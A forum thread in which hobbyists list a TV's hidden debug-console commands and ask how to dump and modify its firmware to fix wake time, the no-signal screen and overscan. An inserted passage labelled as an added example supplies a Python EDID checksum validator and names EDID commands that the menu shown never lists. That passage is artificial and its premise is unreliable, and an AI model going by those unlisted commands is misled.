id: Set Tuner ID
ver: Tuner version
dtd: Nim dtd
atd: Nim atd
d_l: Set Debug Level
go: Start Nim
up: Channel Up
down: Channel Down
channel: Channel Set
freq: Freq Set
init(i): Nim init
open(o): Nim open
close(c): Nim close
setcable(sc): Nim set cable parameters
setBW(sbw): Nim set BW
getcablelevel(gclv): Nim get cable signal level
getcablesignal(gcsc): Nim get cable signal parameter
getcablelock(gclk): Nim get cable lock status
detachmw(dm): Nim Detach MW
detachi2c(dei2c): Detach Tuner I2C
[/HIDE]
ir: Ir command "InfraRed as in the remote I s'pose" [HIDE]
rx(rx): RX commands
[/HIDE]
rtc(rtc): RTC commands "returns [HELP] and nothing more. Real Time Clock I'd wager unless that has another meaning"
aud: Aud command "onboard speakers and other audio functions"[HIDE]
[Help]
ptsdly(ptsd): Delay audio startup by increasing PTS
dd_banner(banner): DD banner turn on for DD Test
spdif: spdif command
adac: adac command
interdac: inter dac command
dsp: dsp command
uop: audio uop
cfg: configuration
t: test
Clip: Aud Clip
factory(fac): Factory mode
[/HIDE]
nptv(n): Nptv command "not the foggiest idea of what these do."[HIDE]
[Help]
Ycproc(ycproc): YCPROC Command
TVD(tvd): TVD Command
NR(nr): NR Command
SCART(scart): SCART Command[/HIDE]
dbs: Dbs command "not this either"[HIDE]
[Help]
init(i): Dbs init
print(p): Dbs print at once
reset(r): Dbs reset[/HIDE]
dmx(d): Demux commands "This looks like the solution, except... the one command does nothing..."[HIDE]
[Help]
query(q):[/HIDE]
memtest: Memory test[HIDE][Help]
run(r): Memory test[/HIDE]
pdwnc(pdwnc): PDWNC commands "another one that just returns [Help]. no idea what it is"
bwt: BWT command "BandWidth Testing. not what I'm looking for I don't think"[HIDE]
[Help]
init: BandWidth Testing Preliminaries
testing: BandWidth Testing (BWT)
report: BandWidth Testing Report
chgchannel: Change Channel Number
dtv: BWT for DTV
atv: BWT for ATV
cvbs: BWT for CVBS
ypbpr: BWT for YPbPr
hdmi: BWT for HDMI
vga: BWT for VGA
src: Get current input source
mtime: Set BWT measure time
pippop: BWT for PIP/POP[/HIDE]
gpio: Gpio interface "General Purpose I/O. Don't think this is what I need either as it's hardware" [HIDE]
[Help]
output(out): gpio.out [gpio num] [[0|1]]
input(in): gpio.in [gpio num]
servo(servo): gpio.servo [0-4][/HIDE]
Wake times are also over 10 seconds, and the bright blue when there's no signal is rather jarring, so I suppose I'll need to extract and modify the firmware. Can anybody help with this?
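The sif menu above exposes raw EDID reads and writes (redid, ralledid, walledid). Before writing a modified block back to a panel, the one check that prevents a bricked or ignored EDID is the header magic plus the byte-127 checksum. The following is an added example, not code from the thread or from the TV's firmware; it validates a 128-byte EDID base block and recomputes the checksum after a byte is changed. The sample block is constructed here and is not a real panel's EDID.

```python
# Added example: sanity-check a 128-byte EDID base block before writing it back.
EDID_HEADER = bytes.fromhex("00ffffffffffff00")  # fixed 8-byte EDID magic


def edid_checksum(block: bytes) -> int:
    """Return the byte that makes all 128 bytes sum to 0 modulo 256."""
    if len(block) != 128:
        raise ValueError("EDID base block must be exactly 128 bytes")
    return (-sum(block[:127])) & 0xFF


def validate_edid(block: bytes) -> list:
    """Return a list of problems found; an empty list means the block looks sane."""
    if len(block) != 128:
        return ["length is %d, expected 128" % len(block)]
    problems = []
    if block[:8] != EDID_HEADER:
        problems.append("bad header magic")
    if sum(block) & 0xFF != 0:
        problems.append("checksum mismatch: byte 127 is 0x%02x, expected 0x%02x"
                        % (block[127], edid_checksum(block)))
    if block[18] != 1:  # byte 18 is the EDID version; only version 1 is defined
        problems.append("unexpected EDID version byte 0x%02x" % block[18])
    return problems


def patch_byte(block: bytes, offset: int, value: int) -> bytes:
    """Return a copy with one byte changed and byte 127 recomputed."""
    if not 0 <= offset < 127:
        raise ValueError("offset must be 0..126 (127 is the checksum)")
    out = bytearray(block)
    out[offset] = value & 0xFF
    out[127] = edid_checksum(bytes(out))
    return bytes(out)


def constructed_sample() -> bytes:
    """A constructed, minimal block with a valid header and checksum (not a real EDID)."""
    b = bytearray(128)
    b[:8] = EDID_HEADER
    b[18] = 1  # version 1
    b[19] = 3  # revision 3
    b[127] = edid_checksum(bytes(b))
    return bytes(b)


if __name__ == "__main__":
    sample = constructed_sample()
    print("sample problems:", validate_edid(sample))
    print("after patch:", validate_edid(patch_byte(sample, 20, 0x80)))
```

Run `validate_edid` on the bytes returned by ralledid before and after editing; a non-empty list means the block should not be written back with walledid.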
Bump I s'pose. Still stuck, so for now I'm working on other things till I find someone who can help with this. I'd rather not drop $25 on a Chinese basic mainboard for the panel, or whatever I can get away with paying for a dubious identical-looking universal mainboard.
So I'm at it again trying to make this work. Glad I posted everything I did since I totally forgot how to work this thing... Still need help. I'm trying to dump the firmware with U-Boot so I can try to modify and reupload it with my custom values.
I also have this TV and would like to disable overscan. How should I connect my PC to one of its service ports? It has two service ports: a type A USB port and some port that I think is called 'ISP' or something like that. For what it's worth, I already have several USB to RS232 adapters (male USB type A on one end of the cable, male RS232 on the other end of the cable), but this TV doesn't have an RS232 port. I've already downloaded a third-party PuTTY app ("PuTTY (Unofficial)", if I recall correctly, from the Microsoft Store).
Edit: Made a correction.
I also have an adapter that is USB type B on both ends. It is called "SharkPort", IIRC. It was designed for connecting a PC to a PlayStation 2 to transfer PS2 game save files. It *might* be a USB host-to-host adapter. It is probably USB 1.0 or 1.1.
Big love for this thread even though I'm probably useless at the moment.
I'm ambitiously following some of your footsteps to tinker with my all-but-entirely defunct Vizio E3D420VX.
Curious how this story played out though; it looks like it relies more on TV knowledge than Linux, and these settings are pretty dense.